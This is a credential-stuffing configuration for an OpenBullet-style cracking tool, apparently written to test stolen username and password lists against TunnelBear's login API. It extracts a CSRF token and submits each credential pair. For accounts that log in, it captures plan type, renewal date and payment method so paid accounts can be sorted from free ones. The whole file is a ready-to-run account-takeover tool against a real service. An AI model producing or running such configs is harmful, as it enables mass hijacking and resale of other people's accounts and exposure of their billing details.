[SETTINGS]
{
  "Name": "TunnelBear v2 (FULL CAPTURA)",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-08-23T02:44:29.9084066-05:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "By CristianUwu",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "TunnelBear v2 (FULL CAPTURA)",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#1 REQUEST GET "https://prod-api-core.tunnelbear.com/core/web/api/getPricingDetails" 
  
  HEADER "Host: prod-api-core.tunnelbear.com" 
  HEADER "Connection: keep-alive" 
  HEADER "TB-CSRF-Token: undefined" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" 
  HEADER "Origin: https://www.tunnelbear.com" 
  HEADER "Referer: https://www.tunnelbear.com/" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: es-ES,es;q=0.9" 

#CSRF PARSE "<COOKIES>" LR "tbcsrf=" "&" -> VAR "CSRF" 

#LOGIN REQUEST POST "https://prod-api-core.tunnelbear.com/core/web/api/login" 
  CONTENT "username=<USER>&password=<PASS>&withUserDetails=true&v=web-1.0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: prod-api-core.tunnelbear.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 90" 
  HEADER "X-XSRF-TOKEN: <CSRF>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" 
  HEADER "TB-CSRF-Token: <CSRF>" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Origin: https://www.tunnelbear.com" 
  HEADER "Referer: https://www.tunnelbear.com/" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: es-ES,es;q=0.9" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Access denied" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
    KEY "result\":\"" 

#DETALLES_DE_LA_CUENTA REQUEST GET "https://prod-api-core.tunnelbear.com/core/web/api/getBillingDetails" 
  
  HEADER "Host: prod-api-core.tunnelbear.com" 
  HEADER "Connection: keep-alive" 
  HEADER "X-XSRF-TOKEN: <CSRF>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" 
  HEADER "Content-Type: application/x-www-form-urlencoded;charset=utf-8" 
  HEADER "TB-CSRF-Token: <CSRF>" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Origin: https://www.tunnelbear.com" 
  HEADER "Referer: https://www.tunnelbear.com/" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: es-ES,es;q=0.9" 

#PLAN PARSE "<SOURCE>" LR "product\":\"" "\",\"" CreateEmpty=FALSE -> CAP "PLAN" "[" "]" 

#RENUEVA PARSE "<SOURCE>" LR "nextBillDate\":\"" "\",\"" CreateEmpty=FALSE -> CAP "RENUEVA" "[" "]" 

#PAYMENT PARSE "<SOURCE>" LR "paymentMethod\":\"" "\"}" CreateEmpty=FALSE -> CAP "PAYMENT" "[" "]" 

#CREDITOS FUNCTION Constant "Cristian1023" -> CAP "Config by" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "fullVersion\":\"0" 
    KEY "Little TunnelBear" 
  KEYCHAIN Success OR 
    KEY "fullVersion\":\"1" 
  KEYCHAIN Custom "FREE" OR 
    KEY "lastYearsPayments\":[]" 

